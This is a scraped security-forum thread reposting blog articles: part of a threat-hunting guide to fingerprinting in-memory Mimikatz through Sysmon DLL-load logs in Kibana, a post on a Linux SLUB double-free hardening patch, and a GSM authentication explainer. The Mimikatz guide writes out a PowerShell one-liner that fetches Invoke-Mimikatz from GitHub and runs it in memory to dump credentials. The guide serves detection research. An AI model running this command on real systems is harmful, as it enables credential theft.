to fingerprint Mimikatz. Figure 36. Images loaded after executing Mimikatz on disk. If you go to page #4, you will see that we start to see a few unique ones loaded by mimikatz (remember that diasymreader.dll was not loaded by mimikatz). Also, you can see that image mimikatz.exe was loaded 4 times and by PowerShell of course. Figure 37. Images loaded after executing Mimikatz on disk. If you go to the next page, page #5, you can see the last unique images loaded by mimikatz. Now this is good for this exercise because we can at least have a basic understanding of the, so far, unique images being loaded by mimikatz when executed on disk. Figure 38. Images loaded after executing Mimikatz on disk. What if I want to see images loaded by Mimikatz only? What I like about using Kibana is that I can filter out or group data records with unique characteristics. Lets say you want to select only images loaded by Mimikatz.exe. We will have to create an extra visualization and add it to our dashboard. You could also type a query on the Kibana Search bar to accomplish that, but I prefer to have an extra visualization that I can interact with too (good exercise). As explained before, in order to create a visualization, click on Visualize on the left panel, and it will automatically take you to edit the only visualization that we have in our dashboard. Next, click on "New" to create a new visualization as shown in figure 39 below. Figure 39. Creating a new visualization. Select Data Table for the visualization type and Winlogbeat for the index. Figure 40. Creating a new visualization. For this visualization, do the following: Set the field to event_data.Image.keyword Give it a name and save it Figure 41. Creating a new visualization. Figure 42. Saving the new visualization. Click on Dashboard on the left console, and add the new visualization to your dashboard as shown in figure 43 below. Figure 43. Adding visualization to dashboard. You will see that now we have better numbers to show per Image (PowerShell.exe & Mimikatz.exe). You can see that PowerShell loaded 437 images overall. That makes sense because we know that it loads 72 images every time it opens and closes, and we used it 6 times which gives us 432 images. We also made PowerShell load one extra image when I showed you what happened when you fat finger a command so with that one we would have 433. Plus the other 4 images named mimikatz.exe that were loaded when we used PowerShell to execute the Mimikatz binary. All that gives us our 437 images loaded as shown in figure 44. Figure 44. New visualization added to dashboard. Then, what you can do with this new visualization is to click on the Image "C:\Tools\mimikatz_trunk\x64\mimikatz.exe" and it will automatically create a filter to show only the images loaded by your selection as shown in figure 46 below. Figure 45. Images loaded only by PowerShell and Mimikatz. Figure 46. Images loaded only by Mimikatz. Figure 47. Images loaded only by Mimikatz. You can also download all the results of the visualization Images_Loaded by clicking on the option "Formatted" below the data table results.That will allow you to export all the results in a CSV format. Save it and open it to highlight a few things. Figure 48. Exporting results of images loaded in a CSV format. Figure 49. Saving CSV file. Open the file and highlight the unique images that were loaded by Mimikatz when it was run on disk. That will help you to document your results. So far, we can consider the highlighted images to be our initial fingerprint for Mimikatz. That will change of course when you start collecting modules being loaded by other programs and comparing results. Figure 50. Result of images loaded after executing Mimikatz on disk. Detecting In-memory Mimikatz Delete/Clean your Index Our next test will be launching mimikatz reflectively in memory. To get started delete/clear your index as shown in figure 51 below. Figure 51. Deleting Index. Refresh your dashboard to confirm that the index was deleted/cleared. Figure 52. Empty Dashboard. Getting ready to run Invoke-Mimikatz Invoke-Mimikatz is not updated when Mimikatz is, though it can be (manually). One can swap out the DLL encoded elements (32bit & 64bit versions) with newer ones. Will Schroeder (@HarmJ0y) has information on updating the Mimikatz DLLs in Invoke-Mimikatz (it’s not a very complicated process). The PowerShell Empire version of Invoke-Mimikatz is usually kept up to date. [Source] Figure 53. Empire's latest Invoke-Mimikatz script. Figure 54. Empire's latest Invoke-Mimikatz script. As shown before in figure 22 when we were getting ready to run the mimikatz binary, we want to make sure that we have a basic baseline of images/modules being loaded by PowerShell when it is opened and closed. Open and close PowerShell 4 times as shown in figure 55 below. Figure 55. Opening and closing PowerShell 4 times. We can see the same 72 images being loaded 4 times. It should show a total of 288, but there might have been a delay making it to the server. I probably refreshed my dashboard to soon and did not capture the last netutils.dll load which happens when PowerShell exits. Anyways, I think that we have a good basic baseline before running mimikatz reflectively in the same PowerShell process. Figure 56. Images loaded by PowerShell before running Mimikatz. Baselining how PowerShell will download Invoke-Mimikatz The easiest way to test Invoke-Mimikatz is by going to its github repo and downloading it before executing it in memory. We have to make sure that we understand what extra images PowerShell needs to load in order to perform network operations and download Invoke-Mimikatz as a string. We can use the same approach of opening and closing PowerShell and run only the commands that will pull the script as a string from Github without executing it yet as shown in figure 57 below. IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/data/module_source/credentials/Invoke-Mimikatz.ps1') Figure 57. Running commands to only download Invoke-Mimikatz. Next, refresh your dashboard and as you already know, you will have most of the unique images count increased by one as shown in figure 58 below. Figure 58. Checking initial images loaded by PowerShell to download Invoke-Mimikatz from Github. Now, if you go to the page #4, you will start to see new unique images/modules. Those are images loaded by PowerShell to perform the "DownloadString" operation. You can go to page #5 too as shown in figure 60, and you will see more unique images. (You can expand your first visualization to see the long paths of a few images. The second visualization we added to the dashboard earlier will just move down) Figure 59. Unique Images loaded by PowerShell to download Invoke-Mimikatz from Github. Figure 60. More unique images loaded by PowerShell to download Invoke-Mimikatz from Github. Then, we can perform the same operation (Downloading Invoke-Mimikatz from Github as a string) to make sure we have a strong fingerprint for that particular action and avoid mixing it with images loaded when Mimikatz is executed in memory. I opened PowerShell three times, executed the same commands to only download Invoke-Mimikatz as a string, and closed them all as shown in figure 61. Figure 61. Downloading Invoke-Mimikatz as a string three times. Then, you will see that the counts for the initial images loaded by PowerShell were increased by 3, but if you go to page #5 as shown in figure 63, you can see our "DownloadString" images loaded 4 times. Figure 62. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times. Figure 63. Images loaded by PowerShell after downloading Invoke-Mimikatz as a string 3 more times. Running Mimikatz in Memory to get started run PowerShell as administrator. Figure 64. Running PowerShell as Administrator. In order to download Invoke-Mimikatz as a string from Github and run it in memory, type the following commands: IEX (New-Object Net.WebClient).DownloadString('https://raw.githubusercontent.com/EmpireProject/Empire/master/module_source/credentials/Invoke-Mimikatz.ps1'); Invoke-Mimikatz -DumpCreds Figure 65. Running Mimikatz in memory. You will of course get the same results as when it was run on disk. Close your PowerShell console. Figure 66. Results from running Mimikatz. Analyzing In-Memory Mimikatz Results After closing PowerShell, refresh your dashboard (Make sure you have the right Time Range), and you will see that our initial default images loaded by PowerShell were only increased by 1 and not by 2 as when we ran Mimikatz on disk. This is because the Mimikatz binary is run reflectively inside of PowerShell, and several of the modules needed are already loaded by PowerShell itself. Figure 67. Images loaded by PowerShell when Mimikatz is executed reflectively in memory. Next, if you go to page #5, you will see that the images loaded during the "DownloadString" operation increased by one (count of 5 now as expected). In addition, we can see one of the images that was also loaded while executing Mimikatz on disk: C:\Windows\System32\WinSCard.dll However, there are four new images that were loaded when Mimikatz was executed reflectively in memory. (I will explain later why those get loaded when we run Invoke-Mimikatz) C:\Windows\System32\whoami.exe C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll C:\Windows\System32\NapiNSP.dll C:\Windows\System32\RpcRtRemote.dll Figure 68. Images loaded by PowerShell when Mimikatz is executed reflectively in memory. On page #6, we can also see a few new images that we did not see when Mimikatz ran on disk. (I will explain later why those get loaded when we run Invoke-Mimikatz). C:\Windows\System32\nlaapi.dll C:\Windows\System32\ntdsapi.dll C:\Windows\System32\pnrpnsp.dll C:\Windows\System32\wbem\fastprox.dll C:\Windows\System32\wbem\wbemprox.dll C:\Windows\System32\wbem\wbemsvc.dll C:\Windows\System32\wbem\wmiutils.dll C:\Windows\System32\wbemcomn.dll C:\Windows\System32\winrnr.dll However, we can also see almost the rest of the images that were loaded when Mimikatz was executed on disk. C:\Windows\System32\apphelp.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\logoncli.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll C:\Windows\System32\wintrust.dll C:\Windows\System32\wkscli.dll I dont see the following modules (Loaded by Mimikatz on disk) as unique ones anymore (count 1). This is because they are used to handle encryption and were part of the "DownloadString" operation base-lining. We handled encrypted traffic with Github so it makes sense. It is safe to say that those modules will be noisy (it does not mean that they do not get loaded while running Mimikatz in Memory though. It is just that PowerShell loads them first to handle the encrypted traffic.) C:\Windows\System32\bcrypt.dll C:\Windows\System32\bcryptprimitives.dll C:\Windows\System32\ncrypt.dll Figure 69. Images loaded by PowerShell when Mimikatz is executed reflectively in memory. You can reduce the width of the first visualization and the second one that we added earlier should move back up next to the first one. This is just so that you can see the total number of images loaded by PowerShell at the end of this test. Figure 70. Images loaded by PowerShell when Mimikatz is executed reflectively in memory. In order to document your findings, export the results to a CSV file by clicking on the option "formatted" below the "Images_Loaded" results, and save it to your computer as shown in figure 71. Figure 71. Exporting results to a CSV file. Comparing Results As we can see in figure 72 below, it does not matter if Mimikatz is executed on disk or in memory. It still loads the same extra modules it needs in order to work. Most of the modules that Mimikatz needs are already loaded by PowerShell depending on what happens before running script, but we can still see a few unique ones that could allow us to create a basic fingerprint for In-memory Mimikatz. For example, if we take out the 3 modules used for encryption, we can use the other 10 to create a basic detection rule. We could hunt by grouping the following modules being loaded in a second or four seconds bucket time. C:\Windows\System32\WinSCard.dll C:\Windows\System32\apphelp.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\logoncli.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll C:\Windows\System32\wintrust.dll C:\Windows\System32\wkscli.dll Figure 72. Comparing results on-disk and in-memory. What about whoami.exe? We could add that to our basic In-memory Mimikatz fingerprint. If an adversary is using the exact Invoke-Mimikatz script from the Empire Project, then it will reduce the number of false positives. The whoami part is defined in the main function of Invoke-Mimikatz as you can see in figure 73 below. It is important to note that Invoke-Mimikatz from PowerSploit does not have this command in the script. Figure 73. Whoami utilized in Invoke-Mimikatz. What about the modules loaded from the wbem directory and WMINet_Utils? All that is part of Windows Management Instrumentation (WMI) technology. It provides access to monitor, command, and control any managed object through a common, unifying set of interfaces, regardless of the underlying instrumentation mechanism. WMI is an access mechanism.[Source]. But, why do they get loaded when we run Mimikatz in Memory? It is because of a simple command used in the Invoke-Mimikatz script to verify if the PowerShell Architecture (32/bit/64bit) matches the OS architecture. Most of the modules in question were pointing to WMI activity so I just accessed the code and looked for any signs of WMI. Invoke-Mimikatz uses the command "Get-WmiObject" and the class "Win32_Processor" to find out information about the CPU and to get the "AddressWidth" value which is used to verify the OS Architecture as shown in figure 74 below. Figure 74. WMI in Invoke-Mimikatz. So I tested that command in my computer and logged all the modules being loaded by PowerShell. I refreshed my dashboard and I saw that all the modules in question were loaded while executing the following command: get-wmiobject -class Win32_Processor Figure 75. Executing get-wmiobject with class Win32_Processor to get information about the CPU. Figure 76. Images loaded after using WMI. I want to point out that the following modules can generate a lot of false positives since they can be triggered by simple office applications (x86/x64) and the use of Internet Browsers such as Internet Explorer as shown in figure 77 below: C:\Windows\System32\nlaapi.dll C:\Windows\System32\ntdsapi.dll Figure 77. Images loaded after using WMI. In addition, in my opinion, depending on how much WMI is used in your environment, it might be a good idea to start monitoring for at least: C:\Windows\Microsoft.NET\Framework64\v2.0.50727\WMINet_Utils.dll You can test that in your environment and see how noisy it can get. Log for WMINet_Utils.dll in .NET versions available in your gold image. On the other hand, most of the rest of the modules are loaded by several third-party and built-in applications, so they are too noisy and could cause a big number of false positives: C:\Windows\System32\nlaapi.dll C:\Windows\System32\ntdsapi.dll C:\Windows\System32\pnrpnsp.dll C:\Windows\System32\wbem\fastprox.dll C:\Windows\System32\wbem\wbemprox.dll C:\Windows\System32\wbem\wbemsvc.dll C:\Windows\System32\wbem\wmiutils.dll C:\Windows\System32\wbemcomn.dll C:\Windows\System32\winrnr.dll So far, our detection strategy is still to look for the following 10 modules: C:\Windows\System32\WinSCard.dll C:\Windows\System32\apphelp.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\logoncli.dll C:\Windows\System32\netapi32.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll C:\Windows\System32\wintrust.dll C:\Windows\System32\wkscli.dll How can we test our group of modules and tune it to reduce false positives? Before thinking on deploying a detection rule like this to your Sysmon config in production, I highly recommend to get a gold image and log every single module loaded by every process or application in the system. I tested this in my own environment at home. Edit and Update your Sysmon config Open the sysmon configuration we used for our initial tests and set it to not exclude anything from Event ID 7 - Image Load (Log everything) as shown in figure 79 below. Figure 78. Editing current sysmon config. Figure 79. Editing current sysmon config. Open cmd.exe as administrator and run the following commands as shown in figure 80 below: sysmon.exe -c [edited sysmon xml file] Then, confirm that the changes were applied by running the following command: sysmon.exe -c (You will see that now everything for ImageLoad is being logged) Figure 80. Updating Rule configurations. Open several applications We are logging every single Image loaded in our system on the top of our Invoke-Mimikatz findings (DO NOT DELETE/CLEAR YOUR INDEX). We can now open and close applications that a user most likely uses in an organization (Depending on the type of job) as shown in figure 81. Figure 81. Open applications on your testing machine. Make sure that you also have the right Time range assigned to your dashboard since we are still using the logs we gathered from when we ran Invoke-Mimikatz. I set mine to Last 1 hour as shown in figure 83. Figure 82. Adjusting Time Range. Refresh your dashboard and you will see a lot of modules being loaded as shown in figure 83 below. You can adjust your visualizations if you want to. That will allow you to see more than 200 images being loaded on your box (That is how many records we set our Images_Loaded to show) Figure 83. Several images being loaded. Hunt for the group of 10 modules Next, with all that data, we can query for the 10 modules of our initial In-Memory Mimikatz fingerprint as shown in figure 84 and 85 below. "WinSCard.dll", "apphelp.dll", "cryptdll.dll", "hid.dll", "logoncli.dll", "netapi32.dll", "samlib.dll", "vaultcli.dll", "wintrust.dll", "wkscli.dll" You will see that 5 out of the 10 modules are still unique from our basic fingerprint (Most of them are used to manage authentication security components and features of the system) as shown in figure 84 below. C:\Windows\System32\WinSCard.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll You might be thinking why not netapi32.dll? (It was actually loaded 2 more times. It does not mean that netapi32.dll is not considered a common binary needed for authentication support. However, since it seems to be used by a few other applications, I rather filter that one out) Figure 84. Querying for only In-memory Mimikatz fingerprint. If you want to know what modules/images are being loaded by a specific Image on the EventID7_Images visualization, click on one of them and a filter will be created to show you only images loaded related to your selection. For example, Excel apparently loads apphelp.dll and wintrust.dll from our list of 10 as shown in figure 85 below. Figure 85. What is loading what?. Or vice-versa you can click on the loaded image and it will filter everything out to show you the Images that loaded that specific module as shown in figure 86. Figure 86. What is loading what? What about other operations where Authentication components are involved? I cleaned/deleted my index and started paying attention to authentication operations such as logging onto web applications or my computer after rebooting it. Logging onto the Kibana Web Interface I opened IE , and the first two modules out of the 10 that get loaded are wintrust.dll and apphelp.dll. Then, I browsed to my ELK's IP address and got a prompt to enter my credentials. I noticed that for IE to do all this, it needed to load 5 out of the 10 modules needed by Mimikatz also as shown in figure 87 below. 3 out of those 5 are still part of the ones required for authentication support. samlib.dll WinSCard.dll vaultcli.dll Figure 87. Images loaded by IE while authenticating to Kibana. Logging onto my system after rebooting it The following processes shown in figure 88 below are the first processes that get started when a system boots up. (The ones with the grayed icons are processes that have already exited the system) Figure 88. Images loaded by the first processes that get started by your system when it boots up. So what happens when we look for the 5 modules that so far are considered part of the combination with less false positives against the processes shown in figure 88? "WinSCard.dll", "cryptdll.dll", "hid.dll", "samlib.dll", "vaultcli.dll" As you can see below in figure 89, there were hits for all of them but by processes involving authentication. The one with the more hits was "LogonUI.exe" Figure 89. "Credential Providers" modules used by a few processes. When conducting research on that particular process (LogonUI.exe) for a training class I put together for some colleagues, I found out the following: "Whenever a user hits Ctrl-Alt-Del, winlogon.exe switches to another desktop and launches a special program, logonui.exe, to interact with the user. The user may be logging on initially, (un)locking the desktop, changing her password or some other task, but the user is interacting with logonui.exe on a special desktop, not winlogon.exe on the default desktop. When authenticating, logonui.exe loads DLLs called "credential providers" which can handle the password, smart card or, with a third-party provider, biometric information, to authenticate against the local SAM database, Active Directory, or some other third-party authentication service." [Source] Therefore, all those 5 modules being loaded together by other processes handling credentials would make sense. We could use this knowledge to filter out a few processes where one would normally enter credentials to authenticate to a certain service or application. For example, processes such as Chrome, IE or even outlook (known for asking your password 50 times a day) would load those modules. SSO via your browser would also load most of those images. Final Thoughts Even though this is just part I of detecting In-memory Mimikatz, we are already coming up with a basic fingerprint that will allow us to reduce the number of false positives when hunting for this tool when it is executed in memory. Based on the number of tests performed, a basic fingerprint for In-memory Mimikatz from a modules perspective could be: C:\Windows\System32\WinSCard.dll C:\Windows\System32\cryptdll.dll C:\Windows\System32\hid.dll C:\Windows\System32\samlib.dll C:\Windows\System32\vaultcli.dll If you can afford (enough space) to log one more image being loaded in your environment, I think it would be a good idea to monitor for the following module. I only see it being loaded by PowerShell after launching several other applications and logging the modules being loaded. C:\Windows\Microsoft.NET\Framework64\[Versions available]\WMINet_Utils.dll Hunting Technique recommended Grouping [Source] "Grouping consists of taking a set of multiple unique artifacts and identifying when multiple of them appear together based on certain criteria. The major difference between grouping and clustering is that in grouping your input is an explicit set of items that are each already of interest. Discovered groups within these items of interest may potentially represent a tool or a TTP that an attacker might be using. An important aspect of using this technique consists of determining the specific criteria used to group the items, such as events having occurred during a specific time window.This technique works best when you are hunting for multiple, related instances of unique artifacts, such as the case of isolating specific reconnaissance commands that were executed within a specific timeframe." Therefore, the idea is to group the 5 images/modules mentioned above being loaded in a 1-5 seconds bucket time while possibly filtering out known processes performing that type of behavior. Only a few processes, as far as I can tell, load all 5 modules (not just one or 2 or 3 or 4) during authentication operations. In addition, NONE of the other processes launched during testing loaded the 5 modules together with the WMINet_Utils.dll one. Therefore, I see the value in grouping them together and seeing what processes are loading all of those in a short period of time (seconds). Once again, this is just part I, and in future posts I will group this approach with other chains of events in order to reduce the number of false positives while hunting for In-Memory Mimikatz. Let me know how it works out for you when logging for those specific modules in your organization. I would highly recommend to take this approach in a gold image first and then log one module at a time to test which might cause several false positives. I would love to hear your results! Feedback is greatly appreciated! Thank you. Update (03/21/2017) Mimikatz New version released 2.1.1 20170320 Extra DLL loaded: "Winsta.dll" Really noisy one so it does not change our basic fingerprint. References: Security Management Components Authentication Security Components Exfiltration/Get-VaultCredential.ps1 PowerSploit - Invoke-Mimikatz Empire Project - Invoke-Mimikatz Process Hacker - SANS Wardog at 8:21 PM Sursa: https://cyberwardog.blogspot.ro/2017/03/chronicles-of-threat-hunter-hunting-for.html?m=1
      • 1
      • Upvote
  12. Protecting the irreplaceable | www.f-secure.com Kimmo Kasslin, 26th Feb 2014 •T-110.6220 Special Coursein Information Security Slides: http://www.cse.tkk.fi/fi/opinnot/T-110.6220/2014_Reverse_Engineering_Malware_AND_Mobile_Platform_Security_AND_Software_Security/luennot-files/T1106220.pdf
      • 2
      • Upvote
  13. La cum scriu eu cod, nici macar eu nu mai stiu ce, cand, de ce si cum am scris, ce sa mai zic de niste analize heuristice...
  14. August 30, 2017 Blocking double-free in Linux kernel On the 7-th of August the Positive Technologies expert Alexander Popov gave a talk at SHA2017. SHA stands for Still Hacking Anyway, it is a big outdoor hacker camp in Netherlands. The slides and recording of Alexander's talk are available. This short article describes some new aspects of Alexander's talk, which haven't been covered in our blog. The general method of exploiting a double-free error is based on turning it into a use-after-free bug. That is usually achieved by allocating a memory region of the same size between double free() calls (see the diagram below). That technique is called heap spraying. However, in case of CVE-2017-2636, which Alexander exploited, there are 13 buffers freed straightaway. Moreover, the double freeing happens at the beginning. So the usual heap spraying described above doesn't work for that vulnerability. Nevertheless, Alexander has managed to turn that state of the system into a use-after-free error. He abused the naive behaviour of SLUB, which is currently the main Linux kernel allocator. It turned out that SLUB allows consecutive double freeing of the same memory region. In contrast, GNU C library allocator has a "fasttop" check against it, which introduces a relatively small performance penalty. The idea is simple: report an error on freeing a memory region if its address is similar to the last one on the allocator's "freelist". A similar check in SLUB would block some double-free exploits in Linux kernel (including Alexander's PoC exploit for CVE-2017-2636). So Alexander modified set_freepointer() function in mm/slub.c and sent the patch to the Linux Kernel Mailing List (LKML). It provoked a lively discussion. The SLUB maintainers didn't like that this check: introduces some performance penalty for the default SLUB functionality; duplicates some part of already existing slub_debug feature; causes a kernel oops in case of a double-free error. Alexander replied with his arguments: slub_debug is not enabled in Linux distributions by default (due to the noticeable performance impact); when the allocator detects a double-free, some severe kernel error has already occurred on behalf of some process. So it might not be worth trusting that process (which might be an exploit). Finally Kees Cook helped to negotiate adding Alexander's check behind CONFIG_SLAB_FREELIST_HARDENED kernel option. So currently the second version of Alexander's patch is accepted and applied to the linux-next branch. It should get to the Linux kernel mainline in the nearest future. We hope that in future some popular Linux distribution will provide the kernel with the security hardening options (including CONFIG_SLAB_FREELIST_HARDENED) enabled by default. Author Positive Research at 7:01 AM Sursa: http://blog.ptsecurity.com/2017/08/linux-block-double-free.html?
  15. DISSECTING GSM ENCRYPTION AND LOCATION UPDATE PROCESS 31/08/2017 0 Comments in Blog by Rashid Feroze Have you ever wondered as what happens when you turn on your mobile phone? How does it communicate to the network in a secure manner? Almost all of us would have read about TCP/IP and many of us would be experts in it but when it comes to telecom, very few know about how it actually works from inside. What’s the message structure in gsm? What kind of encryption it uses? So, today we will talking in detail about the encryption standards of gsm and how the mobile phone update it’s location to the mobile network. WHAT HAPPENS WHEN YOU TURN ON YOUR CELL PHONE? When you turn on your cell phone, It first initiates it’s radio resource and mobility management process. The phone receives a list of frequencies supported on the neighbouring cells either by the SIM or from the network. It camps on a cell depending upon the power level and the mobile provider. After that, It performs a location update process to the network where the authentication happens. After a successful location update, the mobile phone gets it’s TMSI and it is ready to do other operations now. Now, let’s verify the above statements by having a look at the mobile application debug logs. The below screenshots are from the osmocom mobile application which simulates a mobile phone working on a PC. Mobile network information sent by SIM Camping on a cell Location update requested which includes it’s LAI and TMSI Location updating accepted and used encryption standard visible. OBJECTIVE We would capture gsm data in wireshark through osmocom-bb and analyse how the entire process of gsm authentication and encryption happens. We will also see how the location update process happens. We have already talked in detail about osmocom-bb and call setup process in our last blog. We would be skipping that part in this blogpost. GSM ENCRYPTION STANDARDS A5/0 – No encryption used. Just for the sake of completeness. A5/1 – A5/1 is a stream cipher used to provide over-the-air communication privacy in the GSM cellular telephone standard. It is one of seven algorithms which were specified for GSM use. It was initially kept secret, but became public knowledge through leaks and reverse engineering. A number of serious weaknesses in the cipher have been identified. A5/2 – A5/2 is a stream cipher used to provide voice privacy in the GSM cellular telephone protocol. It was used for export instead of the relatively stronger (but still weak) A5/1. It is one of seven A5 ciphering algorithms which have been defined for GSM use. A5/3 (Kasumi) – KASUMI is a block cipher used in UMTS, GSM, and GPRS mobile communications systems. In UMTS, KASUMI is used in the confidentiality and integrity algorithms with names UEA1 and UIA1, respectively. In GSM, KASUMI is used in the A5/3 key stream generator and in GPRS in the GEA3 key stream generator. There are some others also but the above mentioned are used in majority. HOW GSM AUTHENTICATION AND ENCRYPTION HAPPENS? Every GSM mobile phone has a Subscriber Identity Module (SIM). The SIM provides the mobile phone with a unique identity through the use of the International Mobile Subscriber Identity (IMSI). The SIM is like a key, without which the mobile phone can’t function. It is capable of storing personal phone numbers and short messages. It also stores security related information such as the A3 authentication algorithm, the A8 ciphering key generating algorithm, the authentication key (KI) and IMSI. The mobile station stores the A5 ciphering algorithm. AUTHENTICATION The authentication procedure checks the validity of the subscriber’s SIM card and then decides whether the mobile station is allowed on a particular network. The network authenticates the subscriber through the use of a challenge-response method. First, a 128 bit random number (RAND) is transmitted to the mobile station over the air interface. The RAND is passed to the SIM card, where it is sent through the A3 authentication algorithm together with the Ki. The output of the A3 algorithm, the signed response (SRES) is transmitted via the air interface from the mobile station back to the network. On the network, the AuC compares its value of SRES with the value of SRES it has received from the mobile station. If the two values of SRES match, authentication is successful and the subscriber joins the network. The AuC actually doesn’t store a copy of SRES but queries the HLR or the VLR for it, as needed. Generation of SRES ANONYMITY When a new GSM subscriber turns on his phone for the first time, its IMSI is transmitted to the AuC on the network. After which, a Temporary Mobile Subscriber Identity (TMSI) is assigned to the subscriber. The IMSI is rarely transmitted after this point unless it is absolutely necessary. This prevents a potential eavesdropper from identifying a GSM user by their IMSI. The user continues to use the same TMSI, depending on the how often, location updates occur. Every time a location update occurs, the network assigns a new TMSI to the mobile phone. The TMSI is stored along with the IMSI in the network. The mobile station uses the TMSI to report to the network or during call initiation. Similarly, the network uses the TMSI, to communicate with the mobile station. The Visitor Location Register (VLR) performs the assignment, the administration and the update of the TMSI. When it is switched off, the mobile station stores the TMSI on the SIM card to make sure it is available when it is switched on again. ENCRYPTION AND DECRYPTION OF DATA GSM makes use of a ciphering key to protect both user data and signaling on the vulnerable air interface. Once the user is authenticated, the RAND (delivered from the network) together with the KI (from the SIM) is sent through the A8 ciphering key generating algorithm, to produce a ciphering key (KC). The A8 algorithm is stored on the SIM card. The KC created by the A8 algorithm, is then used with the A5 ciphering algorithm to encipher or decipher the data. The A5 algorithm is implemented in the hardware of the mobile phone, as it has to encrypt and decrypt data on the fly. Generation of encryption key(Kc) Data encryption/decryption using Kc GSM AUTHORIZATION/ENCRYPTION STEPS GSM authorization/encryption process 1. When you turn on your mobile for the first time, the MS sends it’s IMSI to the network. 2. when a MS requests access to the network, the MSC/VLR will normally require the MS to authenticate. The MSC will forward the IMSI to the HLR and request authentication Triplets. 3. When the HLR receives the IMSI and the authentication request, it first checks its database to make sure the IMSI is valid and belongs to the network. Once it has accomplished this, it will forward the IMSI and authentication request to the Authentication Center (AuC). The AuC will use the IMSI to look up the Ki associated with that IMSI. The Ki is the individual subscriber authentication key. It is a 128-bit number that is paired with an IMSI when the SIM card is created. The Ki is only stored on the SIM card and at the AuC. The Auc will also generate a 128-bit random number called the RAND. The RAND and the Ki are inputted into the A3 encryption algorithm. The output is the 32-bit Signed Response (SRES). The SRES is essentially the “challenge” sent to the MS when authentication is requested. The RAND, SRES, and Kc are collectively known as the Triplets. The HLR will send the triplets to the MSC/VLR. 4. The VLR/MSC will then forward only the RAND value to the MS. 5. The MS calculates SRES using Ki stored in it’s sim and RAND value send by the network. The MS send this SRES value back to the MSC/VLR. 6. The MSC/VLR matches the SRES value with the one that HLR sent to it. If it matches, it successfully authorizes the MS. 7. Once authenticated, both the mobile and the network generates Kc using the Ki and RAND value with the help of A8 algorithm. 8. The data is then encrypted/decrypted using this uniquely generated key(Kc) with A5 ciphering algorithm. LOCATION UPDATE STEPS. Location update process 1. When you turn on your cellphone, it first tells the network that yes I am here and I want to register to the network. After that It sends a location update request which include it’s previous LAI, It’s TMSI. 2. After receiving the TMSI, if the TMSI does not exists in it’s databse, the VLR asks for IMSI and after recieving the IMSI the VLR asks the HLR for the subscriber info based on his IMSI. Here, if the VLR does not find the TMSI in it’s database, it will find the address of the old VLR which the MS was connected to using the LAI. A request is sent to the old VLR, requesting the IMSI of the subscriber. VLR provides the IMSI corresponding to the TMSI sent by the MS. Note that the IMSI could have been obtained from the mobile. That is not a preferred option as the Location Updating Request is sent in clear so it could be used to determine the association between the IMSI and TMSI. 3. The HLR in turn asks the AuC for the triplets for this IMSI. The HLR forwards the triplets(Rand,Kc,SRES) to the VLR/MSC. 3. The MSC will take details from the VLR and pass only the RAND value to the MS. The MS will compute the SRES again and will send it back to the MSC. 4. The MSC will verify the SRES stored in the VLR and will compare to the SRES sent by the MS. If both matches then the location update is successful. 5. After it is successful, HLR update happens and it will update it’s current location and TMSI is allocated to this MS. Since the TMSI assignment is being sent after ciphering is enabled, the relationship between TMSI and the subscriber cannot be obtained by unauthorized users. The GSM mobile replies back indicating that the new TMSI allocation has been completed. Now, we will analyze the gsm packets in wireshark and check what’s really happening over the air. Immediate assignment – Radio channel requested by MS and radio channel allocated to MS by the MS provider. We can also see what kind of control channel (SDCCH/SACCH) is being used here in the channel description. 2. Location update requested – The MS sends a location update request which include it’s previous LAI and it’s TMSI. 3. Authentication request – The VLR/MSC will forward the RAND which it got from the HLR to the MS. We can clearly see the random value that the network sent to the mobile. 4. SRES generation in MS – The MS will generate the SRES value using the A3 authentication algorithm with the help of Ki stored in the sim. 5. Authentication response – The MS will send the SRES value which it calculated. We can clearly see the SRES value here. 6. Ciphering mode command – The BSC sends the CIPHERING MODE COMMAND to the mobile. Ciphering has already been enabled, so this message is transmitted with ciphering. The mobile replies back to it with mode CIPHERED. We can also see the Ciphering mode complete packet below. We can see that it is using A5/1 cipher. 7. Location updating accepted – After the successful authentication, location update happens where the MS give it’s location information to the network. 8. TMSI reallocation complete – The MS provider will allocate a TMSI to the MS and this message would be encrypted so that no one can sniff the identity of the user (TMSI). 9. Radio channel release – The allocated radio channel is released by the MS. WHAT NOW? It was noticed that sometimes operators didn’t use any encryption at all so that they can handle more load on the network. The encryption/decryption process increases the overhead. Sometimes, there are issues in the configuration of the authentication process which can be used by an attacker to bypass the complete authentication. GSM Security is a huge unexplored field where a lot has still to be explored and done. Now, when you know how to analyze the gsm data upto the lowest level, you can read, analyze and modify the code of osmocom in order to send arbitrary frames to the network or from the network to the phone. You can start fuzzing gsm level protocols in order to find out if you can actually crash any network device. There is a lot to do but that would require a very deep understanding of the gsm networks and also about the legal aspects around this. I would suggest you to create your own gsm network and run your tests on that if you want to go ahead with this. We will be posting more blog posts on gsm. Stay tuned! REFERENCES https://www.sans.org/reading-room/whitepapers/telephone/gsm-standard-an-overview-security-317 http://mowais.seecs.nust.edu.pk/encryption.shtml Sursa: http://payatu.com/dissecting-gsm-encryption-location-update-process/
      • 1
      • Upvote
